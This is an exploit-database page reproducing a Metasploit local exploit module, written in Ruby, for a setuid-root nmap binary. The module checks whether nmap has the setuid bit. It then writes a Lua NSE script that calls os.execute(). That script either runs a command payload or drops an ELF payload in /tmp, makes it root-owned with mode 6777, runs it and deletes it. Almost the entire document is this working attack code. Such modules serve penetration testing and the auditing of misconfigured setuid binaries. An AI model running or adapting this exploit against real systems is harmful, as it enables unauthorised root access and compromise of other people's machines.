Setuid Nmap Exploit



EKU-ID: 2472 CVE: OSVDB-ID:
Author: egypt Published: 2012-07-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'


class Metasploit4 < Msf::Exploit::Local
	Rank = ExcellentRanking

	include Msf::Exploit::EXE
	include Msf::Post::File
	include Msf::Post::Common

	def initialize(info={})
		super( update_info( info, {
				'Name'          => 'setuid nmap "exploit"',
				'Description'   => %q{
					Nmap's man page mentions that "Nmap should never be installed with
					special privileges (e.g. suid root) for security reasons.." and
					specifically avoids making any of its binaries setuid during
					installation.  Nevertheless, administrators sometimes feel the need
					to do insecure things.  This module abuses a setuid nmap binary by
					writing out a lua nse script containing a call to os.execute().

					Note that modern interpreters will refuse to run scripts on the
					command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby}
					payloads will most likely not work.
				},
				'License'       => MSF_LICENSE,
				'Author'        => [ 'egypt' ],
				'Platform'      => [ 'unix', 'linux', 'bsd' ],
				'Arch'          => [ ARCH_CMD, ARCH_X86 ],
				'SessionTypes'  => [ 'shell', 'meterpreter' ],
				'Targets'       =>
					[
						[ 'Command payload', { 'Arch' => ARCH_CMD } ],
						[ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
						[ 'BSD x86',         { 'Arch' => ARCH_X86 } ],
					],
				'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
				'DefaultTarget' => 0,
			}
			))
		register_options([
				# These are not OptPath becuase it's a *remote* path
				OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
				OptString.new("Nmap",        [ true, "Path to setuid nmap executable", "/usr/bin/nmap" ]),
			], self.class)
	end

	def check
		stat = session.fs.file.stat(datastore["Nmap"])
		if stat and stat.file? and stat.setuid?
			print_good("#{stat.prettymode} #{datastore["Nmap"]}")
			return CheckCode::Vulnerable
		end
		return CheckCode::Safe
	end

	def exploit
		if (target.arch.include? ARCH_CMD)
			p = payload.encoded.gsub(/([$"])/) {|m| "\\#{$1}" }
			evil_lua = %Q{ os.execute("#{p} &") }
		else
			exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.elf"
			print_status("Dropping executable #{exe_file}")
			write_file(exe_file, generate_payload_exe)
			evil_lua = %Q{
				os.execute("chown root:root #{exe_file}");
				os.execute("chmod 6777 #{exe_file}");
				os.execute("#{exe_file} &");
				os.execute("rm #{exe_file}");
			}
		end
		lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse"
		print_status("Dropping lua #{lua_file}")
		write_file(lua_file, evil_lua)

		print_status("running")

		begin
			cmd_exec "#{datastore["Nmap"]} --script #{lua_file}"
		ensure
			cmd_exec "rm -f #{lua_file} #{exe_file}"
		end

	end
end